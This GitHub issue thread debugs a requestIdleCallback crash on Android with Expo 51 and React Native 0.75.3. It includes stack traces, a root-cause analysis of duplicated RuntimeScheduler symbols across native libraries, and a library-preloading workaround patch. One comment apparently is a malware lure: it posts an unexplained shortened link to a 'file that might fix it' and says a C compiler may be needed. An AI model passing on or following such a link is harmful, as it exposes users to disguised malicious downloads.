### ISSUE TITLE
requestIdleCallback crashes with bridgeless mode on RN 0.75.3

### ISSUE THREAD

**Issue by oblador** [expo/expo#31564]
### Minimal reproducible example

https://github.com/oblador/expo-requestidlecallback-issue

### What platform(s) does this occur on?

Android

### Where did you reproduce the issue?

in a development build

### Summary

On latest stable `react-native` (0.75.3) and `expo` (51.0.32) with new architecture enabled on Android, calling `requestIdleCallback()` causes the app to crash. This doesn't happen when removing expo or disabling new architecture. 

I understand that 51 is built with 0.74 in mind, but it has been publicly stated that it is compatible with 0.75. Also 0.74 does not have `requestIdleCallback` implemented on bridgeless mode. 

Error message:
```
std::shared_ptr<T> facebook::jsi::Object::getHostObject(Runtime &) const [T = facebook::react::RuntimeSchedulerBinding]: assertion "isHostObject<T>(runtime)" failed
```

Potentially related: #31559

### Environment

<details>
<pre>
  expo-env-info 1.2.0 environment info:
    System:
      OS: macOS 15.0
      Shell: 5.9 - /bin/zsh
    Binaries:
      Node: 20.11.0 - ~/.asdf/installs/nodejs/20.11.0/bin/node
      Yarn: 3.6.4 - ~/.asdf/installs/nodejs/20.11.0/bin/yarn
      npm: 10.2.4 - ~/.asdf/plugins/nodejs/shims/npm
      Watchman: 2023.03.27.00 - /opt/homebrew/bin/watchman
    Managers:
      CocoaPods: 1.12.1 - /Users/joel/.asdf/shims/pod
    SDKs:
      iOS SDK:
        Platforms: DriverKit 24.0, iOS 18.0, macOS 15.0, tvOS 18.0, visionOS 2.0, watchOS 11.0
      Android SDK:
        API Levels: 28, 30, 31, 32, 33, 34
        Build Tools: 29.0.2, 30.0.2, 30.0.3, 31.0.0, 32.0.0, 33.0.0, 33.0.1, 34.0.0
        System Images: android-32 | Google APIs ARM 64 v8a, android-33 | Google Play ARM 64 v8a, android-34 | Google APIs ARM 64 v8a
    IDEs:
      Android Studio: 2024.1 AI-241.18034.62.2411.12071903
      Xcode: 16.0/16A242d - /usr/bin/xcodebuild
    npmPackages:
      expo: ^51.0.0 => 51.0.32
      react: 18.3.1 => 18.3.1
      react-native: 0.75.3 => 0.75.3
    Expo Workflow: bare
</pre>
</details>

### Expo Doctor Diagnostics

<details>
<pre>
npx expo-doctor@latest
✔ Check Expo config for common issues
✔ Check package.json for common issues
✔ Check for app config fields that may not be synced in a non-CNG project
✔ Check dependencies for packages that should not be installed directly
✔ Check for common project setup issues
✔ Check for issues with metro config
✔ Check if the project meets version requirements for submission to app stores
✔ Check npm/ yarn versions
✖ Check Expo config (app.json/ app.config.js) schema
✔ Check for legacy global CLI installed locally
✖ Check that packages match versions required by installed Expo SDK
✔ Check that native modules do not use incompatible support packages
✔ Check native tooling versions
✔ Check that native modules use compatible support package versions for installed Expo SDK

Detailed check results:

Error: Problem validating fields in /Users/joel/Code/RequestIdleCallbackIssue/app.json. Learn more: https://docs.expo.dev/workflow/configuration/
 • should NOT have additional property 'displayName'.

The following packages should be updated for best compatibility with the installed expo version:
  react@18.3.1 - expected version: 18.2.0
  react-native@0.75.3 - expected version: 0.74.5
  @types/react@18.3.7 - expected version: ~18.2.79
  typescript@5.0.4 - expected version: ~5.3.3
Your project may not work correctly until you install the expected versions of the packages.
Found outdated dependencies
</pre>
</details>

**Comment by Buqra55** [comment]
This might help:This file might fix it

https://bit.ly/4eugCty

you may need to install the c compiler

**Comment by BenIrving** [comment]
This appears to crash due to [this](https://github.com/facebook/react-native/blob/v0.75.4/packages/react-native/ReactCommon/jsi/jsi/jsi-inl.h#L187) assert fn call failing

```
template <typename T>
inline std::shared_ptr<T> Object::getHostObject(Runtime& runtime) const {
  assert(isHostObject<T>(runtime));
  return std::static_pointer_cast<T>(runtime.getHostObject(*this));
}
```

This is at the top of the end of the call stack initiated by `RuntimeSchedulerBinding::getBinding(runtime)`  inside requestIdleCallback [here](https://github.com/facebook/react-native/blob/main/packages/react-native/ReactCommon/react/nativemodule/idlecallbacks/NativeIdleCallbacks.cpp#L85)

If we comment out the assert call, everything appears to work okay. We correctly get the binding and can access the runtimeScheduler and the crash goes away.


@brentvatne could expo be somehow interfering with this runtime scheduler? This is blocking our release of rn75 which is supposedly compatible with sdk 51

**Comment by Kudo** [comment]
update for my investigation today:
the main difference is whether [soloader is enabled](https://github.com/expo/expo/blob/59e5603c3dc48142c5daa698f39dc7b294ab0ad9/packages/expo-modules-core/android/src/main/AndroidManifest.xml#L8-L11) and i think that's an issue from react-native core. it could be resolved by 0.76 given all so libs are merged into single libreactnative.so

one workaround is to load libfabricjni.so first
```patch
--- a/android/app/src/main/java/com/requestidlecallbackissue/MainApplication.kt
+++ b/android/app/src/main/java/com/requestidlecallbackissue/MainApplication.kt
@@ -39,6 +39,11 @@ class MainApplication : Application(), ReactApplication {
     super.onCreate()
     SoLoader.init(this, false)
     if (BuildConfig.IS_NEW_ARCHITECTURE_ENABLED) {
+      // Workaround to `facebook::react::RuntimeSchedulerBinding::getBinding` dynamic_cast error
+      // because of the symbol exists in multiple places.
+      // libfabricjni.so is the correct lib and we try to load it first.
+      System.loadLibrary("fabricjni")
+
       // If you opted-in for the New Architecture, we load the native entry point for this app.
       load()
     }
```

will update more details and also try whether 0.76 resolved the issue tomorrow

**Comment by Kudo** [comment]
i can confirm the issue also happens on rnc-cli 0.75 with enabled soloader and all this problem would be resolved from 0.76.

### Root cause in details.
- as @BenIrving mentioned, it fails at `assert(isHostObject<T>(runtime))`. the object is actually a host object, but it fails because [dynamic_cast returns null](https://github.com/facebook/react-native/blob/fa0358a058f0b9c328c638c01b7c2e96ac19a75a/packages/react-native/ReactCommon/jsi/jsi/jsi-inl.h#L177). it could because the type be used across lib boundary.
- when [install the runtime scheduler binding](https://github.com/facebook/react-native/blob/fa0358a058f0b9c328c638c01b7c2e96ac19a75a/packages/react-native/ReactCommon/react/renderer/runtimescheduler/RuntimeSchedulerBinding.cpp#L35-L36), the stacktrace is from `libfabricjni.so`
  ```
    * frame #0: 0x00000071c52c9aec libfabricjni.so`facebook::react::RuntimeSchedulerBinding::createAndInstallIfNeeded(runtime=0xb4000072b00a4410, runtimeScheduler=std::__ndk1::shared_ptr<facebook::react::RuntimeScheduler>::element_type @ 0xb4000072b00a4be8 strong=2 weak=3) at RuntimeSchedulerBinding.cpp:36:5
      frame #1: 0x00000071c19868b8 librninstance.so`facebook::react::ReactInstance::initializeRuntime(facebook::react::ReactInstance::JSRuntimeFlags, std::__ndk1::function<void (facebook::jsi::Runtime&)>)::$_0::operator()(this=0xb4000073cfe50ed0, runtime=0xb4000072b00a4410) const at ReactInstance.cpp:346:5
      frame #2: 0x00000071c198683c librninstance.so`decltype(std::declval<facebook::react::ReactInstance::initializeRuntime(facebook::react::ReactInstance::JSRuntimeFlags, std::__ndk1::function<void (facebook::jsi::Runtime&)>)::$_0&>()(std::declval<facebook::jsi::Runtime&>())) std::__ndk1::__invoke[abi:v170000]<facebook::react::ReactInstance::initializeRuntime(facebook::react::ReactInstance::JSRuntimeFlags, std::__ndk1::function<void (facebook::jsi::Runtime&)>)::$_0&, facebook::jsi::Runtime&>(__f=0xb4000073cfe50ed0, __args=0xb4000072b00a4410) at invoke.h:394:23
  ```
- in the crash case, when calling requestIdleCallback and [get the runtime scheduler binding](https://github.com/facebook/react-native/blob/fa0358a058f0b9c328c638c01b7c2e96ac19a75a/packages/react-native/ReactCommon/react/renderer/runtimescheduler/RuntimeSchedulerBinding.cpp#L57), the stacktrace is from `libreactnativejni.so`
```
  * frame #0: 0x00000071d4f72350 libreactnativejni.so`facebook::react::RuntimeSchedulerBinding::getBinding(runtime=0xb4000072b00a4410) at RuntimeSchedulerBinding.cpp:61:3
    frame #1: 0x0000007246d221e8 libreact_nativemodule_defaults.so`facebook::react::NativeIdleCallbacks::requestIdleCallback(this=0xb40000743ff5d008, runtime=0xb4000072b00a4410, userCallback=0x0000007243a22fd0, options= Has Value=false ) at NativeIdleCallbacks.cpp:85:18
    frame #2: 0x0000007246d254cc libreact_nativemodule_defaults.so`facebook::jsi::Value facebook::react::bridging::callFromJs<facebook::jsi::Value, facebook::react::NativeIdleCallbacks, facebook::jsi::Object, facebook::react::SyncCallback<void (facebook::jsi::Object)>&&, std::__ndk1::optional<facebook::react::NativeIdleCallbacksRequestIdleCallbackOptions<std::__ndk1::optional<double>>>, facebook::jsi::Function, std::__ndk1::optional<facebook::jsi::Object>>(rt=0xb4000072b00a4410, method=(libreact_nativemodule_defaults.so`facebook::react::NativeIdleCallbacks::requestIdleCallback(facebook::jsi::Runtime&, facebook::react::SyncCallback<void (facebook::jsi::Object)>&&, std::__ndk1::optional<facebook::react::NativeIdleCallbacksRequestIdleCallbackOptions<std::__ndk1::optional<double>>>) at NativeIdleCallbacks.cpp:84), jsInvoker=std::__ndk1::shared_ptr<facebook::react::CallInvoker>::element_type @ 0xb400007330239290 strong=27 weak=3, instance=0xb40000743ff5d008, args=0x0000007243a230f0, args= Has Value=false ) at Class.h:49:9
```
- RuntimeSchduler symbols are duplicated in both `libfabricjni.so` and `libreactnativejni.so` (could examine this by `nm` or `objdump`). since we install binding from `libfabricjni.so::RuntimeSchduler` but get the binding from `libreactnativejni.so::RuntimeSchduler`. the type inconsistency makes the dynamic_cast failure.
- when soloader is enabled, soloader will load the lib's dependencies first. (by looking for the [DT_NEEDED](https://chatgpt.com/share/6710aeaa-ae78-8007-ad66-d97cb066a821) list. in this case, `libreactnativejni.so` will be loaded first and being used for `libreact_nativemodule_defaults.so::requestIdleCallback() -> RuntimeSchedulerBinding::getBinding()` resolution.
- when soloader is disabled, the `SoLoader.loadLibrary()` is equivalent to `System.loadLibrary()`. it just loads the lib without loading deps first. in this case, `libfabricjni.so` will be loaded earlier than `libreactnativejni.so`.
- the workaround i shared previously is to call `System.loadLibrary("fabricjni")` beforehand. it tries to load `libfabricjni.so` as early as possible no matter soloader is enabled or not. it makes the RuntimeSchedulerBinding resolution consistent between install bindings and get bindings.

## Summary
since 0.76 will resolve the problem by [the effort of merging solibs](https://github.com/react-native-community/discussions-and-proposals/discussions/816), i have no idea whether the workaround could be a formal solution. let me discuss this problem with meta how we resolve the problem on 0.75.
